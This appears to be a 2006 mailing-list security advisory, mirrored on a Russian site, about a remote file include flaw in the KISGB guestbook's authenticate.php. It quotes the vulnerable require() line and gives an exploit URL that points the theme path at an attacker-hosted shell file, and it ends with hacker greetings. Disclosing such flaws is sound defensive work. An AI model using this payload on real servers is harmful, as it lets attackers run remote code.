Уведомление о безопасности: KISGB (Keep It Simple Guest Book)* [default_path_for_themes] Remote File Include

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  EternalMart Guestbook 1.1.0 [emgb_admin_path] Remote File Include
  Xt-News 0.1 : SQL Injection Vulnerability & XSS
  Multiple Remote Vulnerabilities in KISGB

From: bilkopat_(at)_hotmail.com <bilkopat_(at)_hotmail.com>
Date: 23 декабря 2006 г.
Subject: KISGB (Keep It Simple Guest Book)* [default_path_for_themes] Remote File Include

*********************************************************************************
*********************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
*********************************************************************************
*********************
*******************************************
+class : Remote File Include Vulnerability*
+********************************************************************************
**********************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid
=14&lid=156&type=url#get*
*********************************************************************************
**********************************
+Author : mdx
*
*****************************************************************************
+Files :    *
+authenticate.php?                                                          *
*********************************************************************************
*
+code :                                                                         *
+                                                                                *

+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *

*********************************************************************************
************
+ Exploit :                                                                                *

+********************************************************************************
************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++
=================================================================================
=============
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?
          *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?
          *
?////////////////////////////////////////////////////////////////////////////////
/////////////
?---------------------specials thanks stroke ,SHiKaA----------------------------------------*
*********************************************************************************
*************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.     *
*******************                                                                          *
*********************************************************************************
*************

/////////////////////////////////////////////////////////////////////////////////
/////////////

Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
Vulnerable here.

So this is only vulnerable for CGI PHP versions.

/str0ke

test server